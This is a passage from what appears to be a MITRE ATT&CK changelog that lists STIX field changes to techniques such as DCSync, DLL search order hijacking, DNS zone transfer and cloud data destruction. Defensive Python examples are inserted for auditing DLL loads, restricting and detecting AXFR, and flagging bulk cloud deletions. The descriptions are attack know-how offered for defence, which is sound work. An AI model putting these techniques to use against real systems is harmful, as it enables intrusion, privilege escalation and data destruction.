Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'Bleeping Computer 2easy 2021', 'description': 'Bill Toulas. (2021, December 21). 2easy now a significant dark web marketplace for stolen data. Retrieved October 7, 2024.', 'url': 'https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/'} |
external_references | | {'source_name': 'Bleeping Computer Stealer Logs 2023', 'description': 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain: Stealer Logs in Context. Retrieved October 10, 2024.', 'url': 'https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/'} |
external_references | | {'source_name': 'SecureWorks Infostealers 2023', 'description': 'SecureWorks Counter Threat Unit Research Team. (2023, May 16). The Growing Threat from Infostealers. Retrieved October 10, 2024.', 'url': 'https://www.secureworks.com/research/the-growing-threat-from-infostealers'} |
x_mitre_contributors | | Massimo Giaimo, Würth Group Cyber Defence Center |
[T1555.003] Credentials from Password Stores: Credentials from Web Browsers
Current version: 1.2
Version changed from: 1.1 → 1.2
New Mitigations:
- M1017: User Training
- M1018: User Account Management
- M1021: Restrict Web-Based Content
- M1051: Update Software
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-02-15 19:29:57.405000+00:00 | 2024-08-15 14:13:45.294000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1053.003] Scheduled Task/Job: Cron
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
x_mitre_remote_support | | False |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-03-24 17:33:03.443000+00:00 | 2024-10-15 18:45:51.945000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1003.006] OS Credential Dumping: DCSync
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-04-22 20:20:14.595000+00:00 | 2024-10-15 15:54:08.312000+00:00 |
external_references[6]['description'] | Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017. | Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved September 23, 2024. |
external_references[6]['url'] | http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ | https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ |
x_mitre_version | 1.0 | 1.1 |
[T1574.001] Hijack Execution Flow: DLL Search Order Hijacking
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-28 15:51:58.945000+00:00 | 2024-09-30 17:32:59.948000+00:00 |
description | Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. | Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Hexacorn DLL Hijacking', 'description': 'Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5. Retrieved August 14, 2024.', 'url': 'https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/'} |
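The T1574.001 description above turns on three things a defender can audit: which directory a requested DLL actually resolves from, whether a directory searched earlier is writable by a standard user (a planted copy there would win), and references to DLLs that exist nowhere on the search path (the phantom case). The following is an added example, not ATT&CK content or Microsoft tooling. It models the documented standard search order with SafeDllSearchMode enabled (application directory, System32, System, Windows directory, current directory, then PATH); known DLLs, manifest or redirection entries and absolute-path loads are not modelled. The requested DLL names would normally come from the program's import table; the directory listings and writable set used below are constructed, and `snapshot` gathers real ones when run on the Windows host being audited.

```python
"""
Hardening audit for the Windows DLL search order. Added example: models the
standard search order with SafeDllSearchMode enabled. Known DLLs,
manifest/redirection entries and absolute-path loads are not modelled.
"""
import os
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Set


def _join(directory: str, name: str) -> str:
    # Windows paths are built explicitly so the audit logic runs from any host.
    return directory.rstrip("\\") + "\\" + name


def search_order(app_dir: str, cwd: str, path_entries: Iterable[str],
                 windir: str = r"C:\Windows") -> List[str]:
    """Directories in the order the loader consults them for an unqualified DLL name."""
    return [app_dir, _join(windir, "System32"), _join(windir, "System"),
            windir, cwd, *path_entries]


@dataclass
class Finding:
    dll: str
    resolved_from: Optional[str]          # None: no copy found anywhere (phantom reference)
    writable: bool                        # the directory that wins is user-writable
    shadowable_by: List[str] = field(default_factory=list)  # writable dirs searched earlier


def resolve(dll: str, order: List[str],
            contents: Dict[str, Iterable[str]]) -> Optional[str]:
    """First directory in `order` whose listing holds `dll` (names compare case-insensitively)."""
    target = dll.lower()
    for d in order:
        if any(f.lower() == target for f in contents.get(d, ())):
            return d
    return None


def audit(order: List[str], contents: Dict[str, Iterable[str]],
          writable: Set[str], requested: Iterable[str]) -> List[Finding]:
    findings = []
    for dll in requested:
        src = resolve(dll, order, contents)
        # Every directory consulted before the winner; for a phantom DLL that is the whole order.
        earlier = order if src is None else order[:order.index(src)]
        findings.append(Finding(dll, src, src in writable,
                                [d for d in earlier if d in writable]))
    return findings


def risky(findings: List[Finding]) -> List[str]:
    """DLLs a standard user could substitute: the winning dir is writable, or a writable dir is searched first."""
    return [f.dll for f in findings if f.writable or f.shadowable_by]


def snapshot(order: List[str]):
    """Collect the contents/writable maps from the live filesystem (run on the Windows host itself)."""
    contents, writable = {}, set()
    for d in order:
        if os.path.isdir(d):
            contents[d] = os.listdir(d)
            if os.access(d, os.W_OK):      # coarse: reflects the auditing account's own rights
                writable.add(d)
    return contents, writable
```

Remediation follows from the finding: a writable directory ahead of the winner means either the directory's ACL is too loose or the program should load the library by full path (or from the application directory with a restrictive ACL); a phantom reference with a writable directory anywhere in the order is the case the text calls phantom DLL hijacking.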
[T1590.002] Gather Victim Network Information: DNS
Current version: 1.2
Version changed from: 1.1 → 1.2
New Mitigations:
- M1054: Software Configuration
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 14:32:48.393000+00:00 | 2024-09-12 19:36:20.374000+00:00 |
description | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). | Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns) |
external_references[3]['description'] | Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022. | Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. September 12, 2024. |
external_references[3]['url'] | https://twitter.com/PyroTek3/status/1126487227712921600/photo/1 | https://x.com/PyroTek3/status/1126487227712921600 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'DNS-CISA', 'description': 'CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May Leak Domain Information. Retrieved June 5, 2024.', 'url': 'https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information'} |
external_references | | {'source_name': 'Alexa-dns', 'description': "Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved June 5, 2024.", 'url': 'https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/'} |
external_references | | {'source_name': 'Trails-DNS', 'description': "SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.", 'url': 'https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds'} |
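The paragraph added to T1590.002 concerns zone transfers from a misconfigured server, and the new mitigation is M1054 Software Configuration. The following is an added example, not ATT&CK or CISA tooling, covering both sides of that: `check_allow_transfer` audits `allow-transfer` statements in a BIND-style named.conf fragment (the weak setting and the corrected one are both shown), and `unauthorized_transfers` flags AXFR/IXFR queries in BIND-style query-log lines whose client address is outside the list of authorized secondaries. The configuration and log lines are constructed; the query-log line shape is assumed from BIND's querylog output and may need adjusting for other versions or servers.

```python
"""
Two defender-side checks for DNS zone-transfer (AXFR) exposure. Added
example; config text and log lines are constructed, and the query-log
line shape is an assumption based on BIND's querylog format.
"""
import ipaddress
import re

# --- 1. Configuration audit (mitigation: software configuration) -----------

def zone_bodies(conf: str):
    """Yield (zone name, body text) for each zone statement, matching braces by depth."""
    for m in re.finditer(r'zone\s+"([^"]+)"\s*\{', conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        yield m.group(1), conf[m.end():i - 1]


def check_allow_transfer(conf: str) -> dict:
    """Classify each zone's allow-transfer ACL as 'open' (any), 'restricted', or 'unset'."""
    results = {}
    for name, body in zone_bodies(conf):
        m = re.search(r"allow-transfer\s*\{([^}]*)\}", body)
        if m is None:
            # No per-zone ACL: the options-level or server default applies, so review it explicitly.
            results[name] = "unset"
            continue
        entries = {e.strip() for e in m.group(1).split(";") if e.strip()}
        results[name] = "open" if "any" in entries else "restricted"
    return results


WEAK_CONF = '''
zone "example.com" {
    type primary;
    file "db.example.com";
    allow-transfer { any; };   // any client may pull the whole zone
};
'''

FIXED_CONF = '''
zone "example.com" {
    type primary;
    file "db.example.com";
    allow-transfer { 203.0.113.2; 203.0.113.3; };   // secondaries only
};
'''

# --- 2. Log detection: transfer requests from unexpected clients ------------

# Assumed line shape:
# "<date> <time> client @0x... <ip>#<port> (<zone>): query: <name> IN <type> <flags> (<server ip>)"
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \([^)]*\): "
    r"query: (?P<qname>\S+) IN (?P<qtype>[A-Z0-9]+)"
)


def unauthorized_transfers(log_lines, authorized_cidrs):
    """(client ip, zone, qtype) for every AXFR/IXFR query from outside the authorized networks."""
    nets = [ipaddress.ip_network(c) for c in authorized_cidrs]
    hits = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if m is None or m["qtype"] not in ("AXFR", "IXFR"):
            continue
        ip = ipaddress.ip_address(m["ip"])
        if not any(ip in n for n in nets):
            hits.append((m["ip"], m["qname"], m["qtype"]))
    return hits


# Constructed sample lines (not real traffic); 203.0.113.0/24 is the secondary network.
SAMPLE_LOG = [
    "12-Sep-2024 19:36:20.374 client @0x7f3c2c0a1e10 198.51.100.7#41234 (example.com): query: example.com IN AXFR -E(0)K (203.0.113.1)",
    "12-Sep-2024 19:36:21.001 client @0x7f3c2c0a1e10 203.0.113.2#53 (example.com): query: example.com IN AXFR -E(0)K (203.0.113.1)",
    "12-Sep-2024 19:36:22.112 client @0x7f3c2c0a1e10 198.51.100.7#41235 (example.com): query: www.example.com IN A -E(0)K (203.0.113.1)",
    "12-Sep-2024 19:36:23.550 client @0x7f3c2c0a1e10 192.0.2.44#5353 (example.com): query: example.com IN IXFR -E(0)K (203.0.113.1)",
]
```

A zone reported as `unset` is not automatically safe: whether transfers are then allowed depends on the `options` block and on the server version's default, so the practical rule is to set `allow-transfer` explicitly on every primary zone and alert on any transfer request that the ACL would have refused anyway, since that request is still reconnaissance worth seeing.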
[T1485] Data Destruction
Current version: 1.3
Version changed from: 1.2 → 1.3
New Mitigations:
- M1018: User Account Management
- M1032: Multi-factor Authentication
New Detections:
- DS0010: Cloud Storage (Cloud Storage Modification)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-03 17:30:32.192000+00:00 | 2024-09-25 20:46:14.641000+00:00 |
description | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) | Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | Cloud Storage: Cloud Storage Modification |
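The T1485 update adds the cloud case (deleting storage objects, machine images and database instances) and the Cloud Storage Modification data component. The following is an added example, not ATT&CK content or a vendor detection: it runs over audit records in a CloudTrail-like shape (`eventTime`, `eventName`, `userIdentity.arn`) and raises two kinds of alert, a burst of object or snapshot deletions by one principal inside a time window, and any single irreversible infrastructure deletion. The API names are real AWS operations; the grouping, thresholds and the records produced by `constructed_records` are this example's own.

```python
"""
Detect bulk or high-impact deletion activity in cloud API audit logs.
Added example; records are constructed in a CloudTrail-like shape and
are not real log data.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Real AWS API operation names; the two groups are this example's choice:
# many small deletes are judged by volume, infrastructure deletes on first sight.
BULK_DELETE = {"DeleteObject", "DeleteObjects", "DeleteSnapshot", "DeleteDBSnapshot"}
HIGH_IMPACT = {"DeleteBucket", "DeleteDBInstance", "DeregisterImage"}


def _ts(rec: dict) -> datetime:
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def burst_alerts(records, window=timedelta(minutes=5), threshold=10) -> dict:
    """Principal -> peak number of bulk-delete calls seen inside any `window`, where it reached `threshold`."""
    per_principal = defaultdict(list)
    for r in records:
        if r["eventName"] in BULK_DELETE:
            per_principal[r["userIdentity"]["arn"]].append(_ts(r))
    alerts = {}
    for arn, times in per_principal.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[arn] = max(alerts.get(arn, 0), count)
    return alerts


def high_impact_events(records):
    """(principal, operation, time) for each irreversible infrastructure deletion."""
    return [(r["userIdentity"]["arn"], r["eventName"], r["eventTime"])
            for r in records if r["eventName"] in HIGH_IMPACT]


def constructed_records():
    """Constructed sample: one principal deletes 12 objects in under two minutes, another drops a DB instance."""
    base = datetime(2024, 9, 25, 20, 46, 14, tzinfo=timezone.utc)

    def rec(name, arn, offset_s, source):
        return {"eventTime": (base + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%SZ"),
                "eventName": name, "eventSource": source,
                "userIdentity": {"arn": arn}}

    svc = "arn:aws:iam::123456789012:user/backup-svc"
    alice = "arn:aws:iam::123456789012:user/alice"
    recs = [rec("DeleteObject", svc, i * 9, "s3.amazonaws.com") for i in range(12)]
    recs.append(rec("PutObject", alice, 30, "s3.amazonaws.com"))
    recs.append(rec("DeleteDBInstance", alice, 120, "rds.amazonaws.com"))
    return recs
```

The threshold is the tuning point: service accounts that legitimately prune old objects will trip a low one, so baseline per principal before alerting, and keep the high-impact list threshold-free because a deleted bucket, image or database instance is not undone by noticing it later.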
[T1530] Data from Cloud Storage
Current version: 2.2
Version changed from: 2.1 → 2.2
New Detections:
- DS0025: Cloud Service (Cloud Service Metadata)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-29 16:11:43.530000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[2] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Cloud Service: Cloud Service Metadata |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
[T1213] Data from Information Repositories
Current version: 3.4
Version changed from: 3.3 → 3.4
New Mitigations:
- M1041: Encrypt Sensitive Information
- M1054: Software Configuration
- M1060: Out-of-Band Communications Channel
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-01 16:27:47.391000+00:00 | 2024-10-28 19:10:16.960000+00:00 |
description | Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server. | Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, such as Credential Access, Lateral Movement, or Defense Evasion, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
* Contact or other sensitive information about business partners and customers, including personally identifiable information (PII)
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include the following:
* Storage services such as IaaS databases, enterprise databases, and more specialized platforms such as customer relationship management (CRM) databases
* Collaboration platforms such as SharePoint, Confluence, and code repositories
* Messaging platforms such as Slack and Microsoft Teams
In some cases, information repositories have been improperly secured, typically by unintentionally allowing for overly-broad access by all users or even public access to unauthenticated users. This is particularly common with cloud-native or cloud-hosted services, such as AWS Relational Database Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022) |
x_mitre_version | 3.3 | 3.4 |
x_mitre_platforms[5] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Mitiga', 'description': 'Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops, I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots. Retrieved September 24, 2024.', 'url': 'https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots'} |
external_references | | {'source_name': 'TrendMicro Exposed Redis 2020', 'description': 'David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved September 25, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html'} |
external_references | | {'source_name': 'Cybernews Reuters Leak 2022', 'description': 'Vilius Petkauskas . (2022, November 3). Thomson Reuters collected and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.', 'url': 'https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/'} |
x_mitre_contributors | | Obsidian Security |
x_mitre_contributors | | Naveen Vijayaraghavan |
x_mitre_contributors | | Nilesh Dherange (Gurucul) |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | Naveen Vijayaraghavan, Nilesh Dherange (Gurucul) | |
x_mitre_platforms | Office 365 | |
[T1078.001] Valid Accounts: Default Accounts
Current version: 1.4
Version changed from: 1.3 → 1.4
New Mitigations:
- M1032: Multi-factor Authentication
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-07 14:27:04.770000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1578.003] Modify Cloud Compute Infrastructure: Delete Cloud Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Arun Seelagan, CISA'] |
x_mitre_deprecated | | False |
dictionary_item_removed
